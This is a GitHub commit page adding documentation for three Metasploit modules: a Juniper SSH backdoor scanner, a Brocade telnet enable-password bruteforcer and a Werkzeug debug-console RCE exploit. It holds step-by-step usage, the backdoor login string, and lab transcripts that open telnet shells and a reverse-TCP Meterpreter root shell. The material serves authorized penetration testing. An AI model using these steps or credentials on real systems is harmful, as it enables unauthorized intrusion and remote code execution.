Skip to content

Commit a484875

Browse files
committed
Land rapid7#7165, Add documentation for juniper_backdoor, brocade_enable_login, and werkzeug_debug_rce
2 parents 4c15e5e + 38138e6 commit a484875

File tree

3 files changed

+347
-0
lines changed

3 files changed

+347
-0
lines changed
Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
## Vulnerable Application
2+
3+
Juniper JunOS between 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 are vulnerable.
4+
5+
A vulnerable copy of the firmware is available for a Juiper SSG5/SSG20 (v6.3.0r19.0): [here](https://github.com/h00die/MSF-Testing-Scripts/tree/master/juniper_firmware)
6+
7+
For verification puposes, an example vuln python script is also available [here](https://github.com/h00die/MSF-Testing-Scripts)
8+
9+
## Verification Steps
10+
11+
1. Install the application
12+
2. Start msfconsole
13+
3. Do: ` use auxiliary/scanner/ssh/juniper_backdoor`
14+
4. Do: `set rhosts`
15+
5. Do: `run`
16+
6. You should see: `[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u`
17+
18+
## Scenarios
19+
20+
Example run against a Juniper SSG5 with vuln firmware from above link.
21+
22+
```
23+
msf > use auxiliary/scanner/ssh/juniper_backdoor
24+
msf auxiliary(juniper_backdoor) > set rhosts 192.168.1.1
25+
rhosts => 192.168.1.1
26+
msf auxiliary(juniper_backdoor) > set verbose true
27+
verbose => true
28+
msf auxiliary(juniper_backdoor) > run
29+
30+
[+] 192.168.1.1:22 - Logged in with backdoor account admin:<<< %s(un='%s') = %u
31+
[*] Scanned 1 of 1 hosts (100% complete)
32+
[*] Auxiliary module execution completed
33+
```
Lines changed: 242 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,242 @@
1+
## Vulnerable Application
2+
3+
This module is a login bruteforcer against Brocade network device's `enable` feature.
4+
5+
To configure the device in a vulnerable fashion, follow these steps:
6+
1. Set authentication mode via: `aaa authentication enable default local`
7+
8+
This module works against `enable` so we want to ensure telnet itself has no auth
9+
**The following should not be set**: `enable telnet authentication`
10+
11+
This module has been verified against:
12+
1. ICX6450-24 SWver 07.4.00bT311
13+
2. FastIron WS 624 SWver 07.2.02fT7e1
14+
15+
An emulator is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/brocade_emulator.py)
16+
17+
## Verification Steps
18+
19+
1. Install the emulator or device
20+
2. Start msfconsole
21+
3. Do: `use auxiliary/scanner/telnet/brocade_enable_login`
22+
4. Create/set a password file: `set pass_file /<passwords.lst>`
23+
5. If desired: `set user_as_pass true`
24+
6. Do: `set rhosts <ip>`
25+
7. Do: `run`
26+
8. You should get a shell.
27+
28+
## Scenarios
29+
30+
Example run against ICX6450-24 SWver 07.4.00bT311
31+
32+
```
33+
msf > use auxiliary/scanner/telnet/brocade_enable_login
34+
msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
35+
pass_file => /passwords.lst
36+
msf auxiliary(brocade_enable_login) > set user_as_pass true
37+
user_as_pass => true
38+
msf auxiliary(brocade_enable_login) > set rhosts 192.168.50.1
39+
rhosts => 192.168.50.1
40+
msf auxiliary(brocade_enable_login) > run
41+
42+
[*] Attempting username gathering from config on 192.168.50.1
43+
44+
45+
46+
[*] Attempting username gathering from running-config on 192.168.50.1
47+
48+
49+
50+
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: admin:admin
51+
[*] Attempting to start session 192.168.50.1:23 with admin:admin
52+
[*] Command shell session 1 opened (192.168.50.2:57524 -> 192.168.50.1:23) at 2015-03-06 20:19:41 -0500
53+
[-] 192.168.50.1:23 - LOGIN FAILED: read:admin (Incorrect: )
54+
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: read:read
55+
[*] Attempting to start session 192.168.50.1:23 with read:read
56+
[*] Command shell session 2 opened (192.168.50.2:49223 -> 192.168.50.1:23) at 2015-03-06 20:20:32 -0500
57+
[-] 192.168.50.1:23 - LOGIN FAILED: port:read (Incorrect: )
58+
[+] 192.168.50.1:23 - LOGIN SUCCESSFUL: port:port
59+
[*] Attempting to start session 192.168.50.1:23 with port:port
60+
[*] Command shell session 3 opened (192.168.50.2:34683 -> 192.168.50.1:23) at 2015-03-06 20:21:23 -0500
61+
[-] 192.168.50.1:23 - LOGIN FAILED: admin:port (Unable to Connect: )
62+
[-] 192.168.50.1:23 - LOGIN FAILED: admin:admin (Unable to Connect: )
63+
[-] 192.168.50.1:23 - LOGIN FAILED: admin:12345678 (Unable to Connect: )
64+
[-] 192.168.50.1:23 - LOGIN FAILED: read:port (Unable to Connect: )
65+
[-] 192.168.50.1:23 - LOGIN FAILED: read:read (Unable to Connect: )
66+
[-] 192.168.50.1:23 - LOGIN FAILED: read:12345678 (Unable to Connect: )
67+
[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
68+
[-] 192.168.50.1:23 - LOGIN FAILED: port:port (Unable to Connect: )
69+
[-] 192.168.50.1:23 - LOGIN FAILED: port:12345678 (Unable to Connect: )
70+
[*] Scanned 1 of 1 hosts (100% complete)
71+
[*] Auxiliary module execution completed
72+
msf auxiliary(brocade_enable_login) > sessions -l
73+
74+
Active sessions
75+
===============
76+
77+
Id Type Information Connection
78+
-- ---- ----------- ----------
79+
1 shell TELNET admin:admin (192.168.50.1:23) 192.168.50.2:57524 -> 192.168.50.1:23 (192.168.50.1)
80+
2 shell TELNET read:read (192.168.50.1:23) 192.168.50.2:49223 -> 192.168.50.1:23 (192.168.50.1)
81+
3 shell TELNET port:port (192.168.50.1:23) 192.168.50.2:34683 -> 192.168.50.1:23 (192.168.50.1)
82+
83+
msf auxiliary(brocade_enable_login) > session -i 1
84+
[-] Unknown command: session.
85+
msf auxiliary(brocade_enable_login) > sessions -i 1
86+
[*] Starting interaction with 1...
87+
88+
show sessions ?
89+
Unrecognized command
90+
BR-telnet@FWS624 Router#show ?
91+
802-1w Rapid Spanning tree IEEE 802.1w D10 status
92+
aaa Show TACACS+ and RADIUS server statistics
93+
access-list show IPv4 access-list information
94+
acl-on-arp Show ARP ACL filtering
95+
arp Arp table
96+
auth-mac-addresses MAC Authentication status
97+
batch Batch commands
98+
boot-preference System boot preference
99+
buffer-profile Displays active profile
100+
cable-diagnostics Show Cable Diagnostics
101+
chassis Power supply/fan/temperature
102+
clock System time and date
103+
configuration Configuration data in startup config file
104+
cpu-utilization CPU utilization rate
105+
debug Debug information
106+
default System default settings
107+
dot1x Dot1x information
108+
errdisable Errdisable status
109+
fdp CDP/FDP information
110+
flash Flash memory contents
111+
gvrp GVRP information
112+
inline inline power information
113+
interfaces Port status
114+
--More--, next page: Space, next line: Return key, quit: Control-c
115+
ip IP address setting
116+
ipv6 IP setting
117+
license Show license information
118+
link-aggregate 802.3ad Link Aggregation Information
119+
link-error-disable Link Debouncing Control
120+
link-keepalive Link Layer Keepalive
121+
lldp Link-Layer Discovery Protocol information
122+
local-userdb Local User Database information
123+
logging System log
124+
loop-detection loop detection status & disabled ports
125+
mac-address MAC address table
126+
media 1Gig/10G port media type
127+
memory System memory usage
128+
metro-ring Metro ring protocol information
129+
mirror Mirror ports
130+
module Module type and status
131+
monitor Monitor ports
132+
mstp show MSTP (IEEE 802.1s) information
133+
optic Optic Temperature and Power
134+
port Show port security
135+
priority-mapping 802.1Q tagged priority setting
136+
processes Active process statistics
137+
protected-link-group Show Protected Link Group Details
138+
--More--, next page: Space, next line: Return key, quit: Control-c
139+
ptrace Global ptrace information
140+
qd-buffer-profile User configured buffer/descriptor profiles
141+
qos-profiles QOS configuration
142+
qos-tos IPv4 ToS based QoS
143+
radius show radius server debug info
144+
rate-limit Rate-limiting table and actions
145+
redundancy Display management redundancy details
146+
relative-utilization Relative utilization list
147+
reload Scheduled system reset
148+
reserved-vlan-map Reserved VLAN map status
149+
rmon Rmon status
150+
running-config Current running-config
151+
scheduler-profile User configured scheduling profiles
152+
sflow sFlow information
153+
snmp SNMP statistics
154+
sntp Show SNTP
155+
span Spanning tree status
156+
statistics Packet statistics
157+
stp-bpdu-guard BPDU Guard status
158+
stp-group Spanning Tree Group Membership
159+
stp-protect-ports Show stp-protect enabled ports and their BPDU drop
160+
counters
161+
table-mac-vlan MAC Based VLAN status
162+
--More--, next page: Space, next line: Return key, quit: Control-c
163+
tech-support System snap shot for tech support
164+
telnet Telnet connection
165+
topology-group Topology Group Membership
166+
traffic-policy Show traffic policy definition
167+
trunk Show trunk status
168+
users User accounts
169+
v6-l4-acl-sessions Show IPv6 software sessions
170+
version System status
171+
vlan VLAN status
172+
vlan-group VLAN Group Membership
173+
voice-vlan Show voice vlan
174+
vsrp Show VSRP commands
175+
web-connection Current web connections
176+
webauth web authentication information
177+
who User login
178+
| Output modifiers
179+
<cr>
180+
BR-telnet@FWS624 Router#
181+
```
182+
183+
Example run against emulator mentioned above:
184+
185+
```
186+
msf > use auxiliary/scanner/telnet/brocade_enable_login
187+
msf auxiliary(brocade_enable_login) > set rhosts 127.0.0.1
188+
rhosts => 127.0.0.1
189+
msf auxiliary(brocade_enable_login) > set user_as_pass true
190+
user_as_pass => true
191+
msf auxiliary(brocade_enable_login) > set pass_file /passwords.lst
192+
pass_file => /passwords.lst
193+
msf auxiliary(brocade_enable_login) > run
194+
195+
[*] Attempting username gathering from config on 127.0.0.1
196+
197+
198+
199+
[*] Attempting username gathering from running-config on 127.0.0.1
200+
201+
[-] 127.0.0.1:23 - LOGIN FAILED: username:username (Incorrect: )
202+
[-] 127.0.0.1:23 - LOGIN FAILED: username:12345678 (Incorrect: )
203+
[-] 127.0.0.1:23 - LOGIN FAILED: username:123456 (Incorrect: )
204+
[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: username:password
205+
[*] Attempting to start session 127.0.0.1:23 with username:password
206+
[*] Command shell session 1 opened (127.0.0.1:60089 -> 127.0.0.1:23) at 2015-03-06 20:05:57 -0500
207+
[-] 127.0.0.1:23 - LOGIN FAILED: ttrogdon:password (Incorrect: )
208+
[+] 127.0.0.1:23 - LOGIN SUCCESSFUL: ttrogdon:ttrogdon
209+
[*] Attempting to start session 127.0.0.1:23 with ttrogdon:ttrogdon
210+
[*] Command shell session 2 opened (127.0.0.1:33204 -> 127.0.0.1:23) at 2015-03-06 20:06:47 -0500
211+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ttrogdon (Incorrect: )
212+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:dmudd (Incorrect: )
213+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:12345678 (Incorrect: )
214+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:123456 (Incorrect: )
215+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:password (Incorrect: )
216+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:passwords (Incorrect: )
217+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:ports (Incorrect: )
218+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:admin (Incorrect: )
219+
[-] 127.0.0.1:23 - LOGIN FAILED: dmudd:read (Incorrect: )
220+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ttrogdon (Incorrect: )
221+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:TopDogUser (Incorrect: )
222+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:12345678 (Incorrect: )
223+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:123456 (Incorrect: )
224+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:password (Incorrect: )
225+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:passwords (Incorrect: )
226+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:ports (Incorrect: )
227+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:admin (Incorrect: )
228+
[-] 127.0.0.1:23 - LOGIN FAILED: TopDogUser:read (Incorrect: )
229+
[*] Scanned 1 of 1 hosts (100% complete)
230+
[*] Auxiliary module execution completed
231+
msf auxiliary(brocade_enable_login) > sessions -l
232+
233+
Active sessions
234+
===============
235+
236+
Id Type Information Connection
237+
-- ---- ----------- ----------
238+
1 shell TELNET username:password (127.0.0.1:23) 127.0.0.1:60089 -> 127.0.0.1:23 (127.0.0.1)
239+
2 shell TELNET ttrogdon:ttrogdon (127.0.0.1:23) 127.0.0.1:33204 -> 127.0.0.1:23 (127.0.0.1)
240+
241+
msf auxiliary(brocade_enable_login) >
242+
```
Lines changed: 72 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,72 @@
1+
## Vulnerable Application
2+
3+
Verified against:
4+
+ 0.9.6 on Debian
5+
+ 0.9.6 on Centos
6+
+ 0.10 on Debian
7+
8+
A sample application which enables the console debugger is available [here](https://github.com/h00die/MSF-Testing-Scripts/blob/master/werkzeug_console.py)
9+
10+
## Verification Steps
11+
12+
1. Install the application
13+
2. Start msfconsole
14+
3. Do: `use exploit/multi/http/werkzeug_debug_rce`
15+
4. Do: `set rport <port>`
16+
5. Do: `set rhost <ip>`
17+
6. Do: `check`
18+
```
19+
[+] 10.108.106.201:8081 - The target is vulnerable.
20+
```
21+
7. Do: `set payload python/meterpreter/reverse_tcp`
22+
8. Do: `set lhost <ip>`
23+
9. Do: `exploit`
24+
10. You should get a shell.
25+
26+
## Options
27+
28+
**TARGETURI**
29+
30+
TARGETURI by default is `/console`, as defined by werkzeug, however it can be changed within the python script.
31+
32+
## Scenarios
33+
34+
Example utilizing the previously mentioned sample app listed above.
35+
36+
```
37+
msf > use exploit/multi/http/werkzeug_debug_rce
38+
msf exploit(werkzeug_debug_rce) > set rport 8081
39+
rport => 8081
40+
msf exploit(werkzeug_debug_rce) > set rhost 10.108.106.201
41+
rhost => 10.108.106.201
42+
msf exploit(werkzeug_debug_rce) > check
43+
[+] 10.108.106.201:8081 - The target is vulnerable.
44+
msf exploit(werkzeug_debug_rce) > set payload python/meterpreter/reverse_tcp
45+
payload => python/meterpreter/reverse_tcp
46+
msf exploit(werkzeug_debug_rce) > set lhost 10.108.106.121
47+
lhost => 10.108.106.121
48+
msf exploit(werkzeug_debug_rce) > exploit
49+
50+
[*] Started reverse handler on 10.108.106.121:4444
51+
[*] Sending stage (25277 bytes) to 10.108.106.201
52+
[*] Meterpreter session 2 opened (10.108.106.121:4444 -> 10.108.106.201:36720) at 2015-07-09 19:02:52 -0400
53+
54+
meterpreter > getpid
55+
Current pid: 13034
56+
meterpreter > getuid
57+
Server username: root
58+
meterpreter > sysinfo
59+
Computer : werkzeug
60+
OS : Linux 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt11-1 (2015-05-24)
61+
Architecture : x86_64
62+
Meterpreter : python/python
63+
meterpreter > shell
64+
Process 13037 created.
65+
Channel 0 created.
66+
/bin/sh: 0: can't access tty; job control turned off
67+
# ls
68+
app.py app.pyc werkzeug
69+
# exit
70+
meterpreter > exit
71+
[*] Shutting down Meterpreter...
72+
```

0 commit comments

Comments
 (0)